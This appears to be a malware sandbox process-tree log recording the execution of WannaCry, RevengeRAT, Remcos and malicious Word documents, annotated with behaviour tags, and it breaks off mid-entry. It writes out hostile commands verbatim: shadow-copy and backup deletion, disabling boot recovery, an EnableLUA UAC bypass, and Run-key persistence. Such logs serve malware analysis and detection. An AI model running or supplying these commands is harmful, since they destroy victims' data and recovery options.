C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5580
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\WannaCry.EXE"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\WannaCry.EXE"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1520 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5548
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3824
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 114191728143362.bat2⤵
- System Location Discovery: System Language Discovery
PID:3696 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵
- System Location Discovery: System Language Discovery
PID:4620
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5772
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]PID:5340
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- System Location Discovery: System Language Discovery
PID:5772 -
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3828 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:2728
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
-
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4732
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1244
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oefimrcpcbg941" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe\"" /f2⤵
- System Location Discovery: System Language Discovery
PID:5848 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oefimrcpcbg941" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:5164
-
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:3280
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5328
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]PID:3244
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6128
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3736
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:212
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4020
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:772
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2768
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1892
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5204
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3908
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3576
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exetaskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5300
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5932
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5292
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exePID:6244
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]PID:7248
-
-
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exetaskdl.exe2⤵PID:7992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "1⤵PID:6128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "1⤵PID:3580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "1⤵PID:3840
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat1⤵PID:4880
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5524 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5964 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5544
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dwn_s9c7.cmdline"3⤵PID:6900
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7579.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6721FD667E9419683F1B72DB5B65D.TMP"4⤵PID:4032
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ziet5enf.cmdline"3⤵PID:7356
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES777C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF3792E12D71B4AAB869775C026276BDF.TMP"4⤵PID:7548
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s-dem-n3.cmdline"3⤵PID:3292
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7847.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc57F27A776382403197F448C10EFCE8E.TMP"4⤵PID:7812
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s_uvtyxp.cmdline"3⤵PID:6044
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFDC1EC8FA45A4ABBB572895E4C3F66B4.TMP"4⤵PID:6420
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q614avzi.cmdline"3⤵PID:6528
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7970.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc42311B16FC5B49318CD1B7A0B66D315F.TMP"4⤵PID:1272
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w2sk2dj5.cmdline"3⤵PID:6696
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79DE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc86B6A653E7164AA89477412459388C77.TMP"4⤵PID:6804
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lprpt8jw.cmdline"3⤵PID:6236
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A99.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc25D1644363454DE1B58BEF917A5DF3B7.TMP"4⤵PID:6148
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9-cek1oy.cmdline"3⤵PID:6912
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CFA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc978F61B4CAB45269105B98E8EB5855.TMP"4⤵PID:6176
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rkm3pt6a.cmdline"3⤵PID:7284
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EC0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc220B7D1EBD4E4C039BFC598B2C1691E7.TMP"4⤵PID:7736
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wfvh9_gf.cmdline"3⤵PID:7940
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F2D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc40286C9637D4CF792EB5627F5FC6352.TMP"4⤵PID:3992
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zyyd3-dk.cmdline"3⤵PID:5204
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES846D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9D32972F85F94789969FB8C52A454B8.TMP"4⤵PID:2200
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wgw2jvai.cmdline"3⤵PID:7760
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8509.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc14953FE767DB4D489CA5EE623D89C38F.TMP"4⤵PID:6648
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yofmqtko.cmdline"3⤵PID:6324
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8586.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc81C06CDDB8C40FBABF1EE8D16F7DDDA.TMP"4⤵PID:6468
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3dmj56cx.cmdline"3⤵PID:1272
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85F3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF4FB1DFECDA54404AB18125BCDFF2E1.TMP"4⤵PID:2464
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wzxxw9eu.cmdline"3⤵PID:5836
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8661.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc47099893FDD44A129212644AFA40C04E.TMP"4⤵PID:7144
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yxdr3hnu.cmdline"3⤵PID:8088
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4848
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD7F6E8A22E474D809B8E4060CCECEA95.TMP"4⤵PID:6472
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gmlye8ee.cmdline"3⤵PID:7120
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES872C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFA34D1B1B0E742AB9C7796A8BA56367.TMP"4⤵PID:2836
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o4mp3hw4.cmdline"3⤵PID:7156
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES878A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDFE381C923D54126A7B0F22FC53F70A1.TMP"4⤵PID:3928
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q3_q0wkj.cmdline"3⤵PID:6768
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8807.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc302CDCFA903040FA92695A75898ADF5E.TMP"4⤵PID:6692
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yppj7a3h.cmdline"3⤵PID:6824
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8874.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFB1771875334F0CB4C74ED628E3364C.TMP"4⤵PID:7984
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9w4onlmw.cmdline"3⤵PID:6936
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88D2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF8AA212DCF0F47FFBEA84693B524AD89.TMP"4⤵PID:8032
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cvf4xflq.cmdline"3⤵PID:6272
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES892F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFDE3BA6CCBB48D29C31E15D8D71487.TMP"4⤵PID:6776
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d_ccolat.cmdline"3⤵PID:8080
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES899D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCC20021DBB0F4E19BEE4E862D44D328D.TMP"4⤵PID:7576
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3x49a5dq.cmdline"3⤵PID:6376
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89FB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF31171E28E24584B5B1FC867DBD71F.TMP"4⤵PID:7040
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"3⤵PID:7592
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵PID:7172
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"5⤵PID:7712
-
-
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "2⤵
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4296
-
-
C:\Windows\SysWOW64\Userdata\Userdata.exe"C:\Windows\SysWOW64\Userdata\Userdata.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:5188 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2512
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5320 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
PID:840 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3244
-
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1936
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CobaltStrike.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
